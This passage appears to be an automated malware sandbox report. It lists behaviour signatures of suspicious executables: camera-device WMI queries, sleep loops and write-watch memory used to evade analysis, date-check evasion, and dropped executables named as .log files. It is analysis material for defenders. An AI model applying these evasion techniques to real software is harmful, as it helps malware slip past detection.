Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\portintosvc\driverInto.exe Memory allocated: 12C0000 memory reserve | memory write watch Jump to behavior
Source: C:\portintosvc\driverInto.exe Memory allocated: 1AF40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Memory allocated: E30000 memory reserve | memory write watch
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Memory allocated: 1A920000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597282 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 597125 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 596926 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594834 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 594672 Jump to behavior
Source: C:\portintosvc\driverInto.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599843
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599705
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599281
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 599000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 3600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 598047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 596172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 595234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594859
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594515
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594319
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 594140
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593832
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 593523
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 589047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588625
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 588265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587593
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 587000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 586172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585949
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585687
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585437
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 585062
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584780
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 584297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583968
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 583312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 582234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581730
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581591
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581390
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581218
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 581018
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 579047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 300000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578875
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 578130
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577872
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577748
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577621
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577449
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577328
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577156
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 577017
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576863
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576462
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 576353
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 574359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573713
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573450
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573338
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573230
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573125
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 573015
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572905
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572794
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572650
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572546
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572421
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572179
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 572019
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571890
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571781
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 571587
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 570031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569697
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569318
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 569031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568906
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568788
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568686
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568466
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Thread delayed: delay time: 568250
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\portintosvc\driverInto.exe Window / User API: threadDelayed 4450 Jump to behavior
Source: C:\portintosvc\driverInto.exe Window / User API: threadDelayed 1129 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1944 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1948 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2078
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Window / User API: threadDelayed 7091
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Window / User API: threadDelayed 2267
Found dropped PE file which has not been started or loaded
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nntxgNlb.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cvopZsny.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fJkHwTWu.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VaRrMrQM.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uCFUtfTN.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TQvqMYlM.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SHKzphsQ.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DtICHrzA.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EqkKdrOv.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mqRpKNWg.log Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Evasive API call chain: GetLocalTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599641s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599516s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -599406s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99874s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99656s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99546s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99437s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99327s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99218s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99109s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -99000s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98890s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98781s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98672s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98562s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98453s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98343s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98234s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98125s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -597282s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -597125s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -596926s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -594834s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620 Thread sleep time: -594672s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 5852 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 6148 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep count: 1944 > 30 Jump to behavior
